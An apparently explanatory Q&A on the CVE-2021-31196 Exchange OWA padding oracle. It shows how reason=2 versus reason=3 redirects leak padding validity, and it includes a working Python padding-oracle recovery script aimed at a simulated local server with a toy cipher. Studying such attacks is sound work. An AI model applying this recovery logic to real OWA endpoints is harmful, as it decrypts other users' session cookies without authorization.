How can an attacker determine whether the decryption of a modified ciphertext succeeded when exploiting CVE-2021-31196?
After sending a GET request to `/owa/` with the crafted cookie, the server answers with a 302 redirect, and the redirect URL (visible in the `Location` header and echoed in the response body) carries a `reason` parameter, the `LogonReason` code. `reason=2` means `InvalidCredentials`: the cookie decrypted and unpadded cleanly and the server got as far as checking the credentials, which did not match. For the attacker that is the positive signal: the modified ciphertext had valid padding. `reason=3` means `Timeout`: the server treated the cookie as expired, so that candidate ciphertext did not decrypt to a usable value and the attacker moves on to the next guess. This difference between the two redirects is the oracle that drives the Padding Oracle Attack, as detailed in the open-source code example.
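The following is an added example, not code from the original post, from Exchange, or from the open-source code it refers to. It shows how the `reason=2` / `reason=3` distinction is turned into byte-by-byte plaintext recovery. Everything network-facing is replaced by a local stand-in: `FakeOwaServer` is a hypothetical class that decrypts a CBC-mode cookie and returns the `LogonReason` code the answer above describes (2 when unpadding succeeds, 3 when it fails), and the block cipher is a toy 4-round Feistel network standing in for AES so the script runs offline without extra libraries. The cookie payload and the key are constructed sample data; the cipher and server names are assumptions, not Exchange's own.

```python
"""Padding-oracle recovery driven by a reason=2 / reason=3 style oracle.

Added example, not from the original page or from Exchange. The Feistel
cipher is a toy stand-in for AES; FakeOwaServer is a hypothetical model
of the FBA endpoint that answers with the LogonReason code described.
"""
import hashlib
import os

BLOCK = 16  # block size in bytes, as for AES-CBC


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key, rnd, half):
    # Keyed round function for the toy cipher (assumption: not a real cipher).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key, block):
    # 4-round Feistel: (L, R) -> (R, L ^ F(R)); invertible by construction.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _round_fn(key, rnd, right))
    return left + right


def toy_decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round_fn(key, rnd, left)), left
    return left + right


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += xor(toy_decrypt_block(key, blk), prev)
        prev = blk
    return pkcs7_unpad(out)


class FakeOwaServer:
    """Hypothetical stand-in for the /owa/ FBA endpoint (assumption)."""

    def __init__(self):
        self.key = os.urandom(16)  # constructed secret, never known to the attacker
        self.queries = 0

    def make_cookie(self, payload):
        iv = os.urandom(BLOCK)
        return iv, cbc_encrypt(self.key, iv, pkcs7_pad(payload))

    def logon_reason(self, iv, ciphertext):
        # Models the redirect: bad padding -> Timeout (3); clean decryption
        # followed by a failed credential check -> InvalidCredentials (2).
        self.queries += 1
        try:
            cbc_decrypt(self.key, iv, ciphertext)
        except ValueError:
            return 3
        return 2


def recover_block(oracle, prev_block, target_block):
    """Recover P = D(C) ^ prev for one block by forging the preceding block."""
    inter = bytearray(BLOCK)  # learned bytes of D(target_block)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad  # force already-known tail bytes to the pad value
        for guess in range(256):
            forged[pos] = guess
            if oracle(bytes(forged), target_block) != 2:
                continue
            if pos == BLOCK - 1:
                # Last byte: rule out an accidental longer padding (e.g. 02 02)
                # by perturbing the byte before it and re-asking the oracle.
                forged[pos - 1] ^= 1
                ok = oracle(bytes(forged), target_block) == 2
                forged[pos - 1] ^= 1
                if not ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no guess produced valid padding")
    return xor(bytes(inter), prev_block)


def recover_plaintext(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


def demo():
    server = FakeOwaServer()
    payload = b"constructed-cookie-payload:alice:hunter2"  # constructed sample, not a real format
    iv, ct = server.make_cookie(payload)
    return recover_plaintext(server.logon_reason, iv, ct), server.queries


if __name__ == "__main__":
    recovered, queries = demo()
    print(recovered, "after", queries, "oracle queries")
```

The attacker never needs the key: each query sends a forged previous block as the IV of a one-block cookie, and the server's choice between the two redirects reveals whether the resulting plaintext ended in valid PKCS#7 padding. The cost is at most 256 queries per byte plus the occasional re-check, which is why the redirect must be read for the `reason` value rather than just its status code.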